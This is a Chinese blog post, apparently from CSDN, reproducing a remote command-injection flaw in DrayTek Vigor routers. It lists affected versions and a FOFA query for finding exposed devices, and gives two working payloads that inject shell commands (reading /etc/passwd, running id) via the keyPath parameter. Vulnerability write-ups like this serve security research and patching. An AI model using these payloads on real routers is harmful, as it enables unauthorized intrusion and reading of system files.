DrayTek Vigor 路由器远程命令执行漏洞复现(CNVD-2022-31821)

于 2024-01-31 12:00:00 发布
阅读量672 收藏 3
点赞数 7
分类专栏: 漏洞复现篇 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42181573/article/details/135839915
版权

文章目录

一、漏洞描述

DrayTek Vigor是一种路由器。
DrayTek Vigor中存在一个远程命令注入漏洞,攻击者可利用该漏洞通过在mainfunction.cgi中包含格式错误的查询字符串的精心编制的HTTP消息,让远程恶意用户执行任意代码。

二、影响版本

DrayTek Vigor3900 1.5.1.3
DrayTek Vigor2960 1.5.1.3
DrayTek Vigor300B 1.5.1.3

三、环境搭建

FOFA规则:title=”Vigor 2960”
在这里插入图片描述

三、漏洞复现

执行payload:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}/etc/passwd%26ls%0A%27&loginUser=a&loginPwd=a

在这里插入图片描述
执行payload:

action=login&keyPath=%27%0Aid%0A%27&loginUser=a&loginPwd=a

在这里插入图片描述

四、修复建议

厂商已发布了漏洞修复程序,请及时关注更新:https://www.draytek.com/

Li-D
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DrayTek Vigor AP910C 路由器后台RCE漏洞复现
0xSec
12-12 763
DrayTekVigorAP910C存在后台RCE漏洞。攻击者可通过该漏洞在设备任意执行代码写入后门,获取设备权限,进而控制整个设备。
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6654
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
29款DrayTek 路由器受严重RCE漏洞影响
smellycat000的专栏
08-05 1217
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Trellix 公司的安全研究员发现一个严重的远程代码执行 (RCE)漏洞 (CVE-2022-32548),影响29款 DrayTek Vigor 系列企业路由器。该漏洞过的CVSS v3 评分为10分,为‘’严重”级别。无需凭据或用户交互,默认的设备配置即可使攻击者通过互联网和LAN利用该漏洞实施攻击。利用该漏洞的黑...
Draytek企业网络设备命令注入复现(CVE-2020-8515)
thelostworld
04-10 1195
一、漏洞描述DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。二、影响范围Vigor2960 < v1.5.1Vigor300B < v1.5.1Vigor3900 &lt...
攻击者正利用DrayTek路由器0day漏洞修改DNS设置
weixin_33882452的博客
05-21 890
DrayTek是一家台湾宽带CPE(客户端设备)制造商,其生产的设备主要包括路由器、交换机、防火墙以及VPN设备等。5月18日,该公司宣布称,黑客正在利用其DrayTek路由器中存在的0day漏洞,来更改部分路由器的DNS设置。 就在多位DrayTek路由器用户在Twitter上报告称,发现了DrayTek路由器的DNS设置已经更改,并指向位于3...
DrayTek路由器设置.xls
07-12
设置登陆端口 http Port 本来是:80端口。现在设为401端口。
draytek路由器设置
01-15
draytek路由器设置
Draytek Smart Client 5.6.4
最新发布
03-29
Draytek Smart Client 5.6.4 For Windows
scot-deer-collisions:R Shiny应用
05-05
username = " matt-dray " ) 该应用程序依赖于以下软件包:{shiny},{shinydashboard},{leaflet},{DT},{dplyr},{sf}和{icon}。 数据 从博客文章: 由管理一直在监测英国的鹿与汽车碰撞数据。 数据已打开。 ...
vue-drag-drop:轻量级的Vue包装器,抽象出了拖放浏览器API的重要部分
02-06
:exclamation_mark: 1.0.0版本已经发布! 最后,这包括对IE / Edge的支持。 请注意,这需要完全跳过本机transferData事件属性,而转而使用保留当前拖动传递信息的全局变量。 从理论上讲,这可以打破一些极端事件,...
PHP文件包含漏洞(利用phpinfo)
Li-D的博客
12-31 8477
漏洞描述 文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP中引发文件包含漏洞的通常是以下四个函数: 1、include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once()功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次。 3、require()只要程序一执行
Tomcat代码执行漏洞(CVE-2017-12615)
Li-D的博客
08-30 7317
漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 影响版
Tomcat 幽灵猫任意文件读取漏洞(CVE-2020-1938)
Li-D的博客
09-16 3487
漏洞描述 Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器。Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 漏洞影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 漏洞危害 攻击者可利用该漏洞进行任意文
Apache Flink RCE漏洞复现(任意 Jar 包上传)
Li-D的博客
08-31 3081
漏洞描述 Apache Flink Dashboard 默认无需认证即可访问,攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 影响版本 Apache Flink <= 1.9.1 环境搭建 操作系统: Windows10 操作环境: Apache flink 漏洞版本: Apache flink 1.9.1 搭建过程: (1)下载flink (https://archive.apache.org/dist/flink/flink-1.9.
Ubuntu特权提升漏洞(CVE-2021-3493)
Li-D的博客
04-25 2963
漏洞描述 OverlayFS漏洞允许Ubuntu下的本地用户获得root权限。Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM
Apache SSI 远程命令执行漏洞
Li-D的博客
12-31 2780
漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=“id” -->语法执行命令。 使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。 漏洞危害 攻击者可以利用此问题进行任意命令执行操作。这可能有助于进一步的攻击。 漏洞影响
Spring Cloud Config目录遍历漏洞(CVE-2019-3799)
Li-D的博客
09-16 2377
漏洞描述 Spring Cloud Config目录遍历漏洞的本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件。攻击者可以构建恶意URL以利用目录遍历漏洞漏洞危害 由于spring-cloud-config-server模块未对传入路径进行安全限制,攻击者可以利用多个…%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。 漏洞影响版本 Spring Cloud Config 2.1.0 to 2.1.1 Spring Cloud Conf
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1778
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
useradd -m -d
09-22
useradd -m -d是一个Linux系统中创建用户的命令,其中-m表示同时创建用户的主目录,-d后面跟着指定的目录路径,表示指定用户主目录的位置。这个命令还可以使用其他选项,比如-g指定用户所属的主组,-G指定用户所属的附加组,-s指定用户的登录Shell等等。这个命令还可以结合其他命令一起使用,比如passwd命令可以用于修改用户的密码,userdel命令可以用于删除用户账号。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值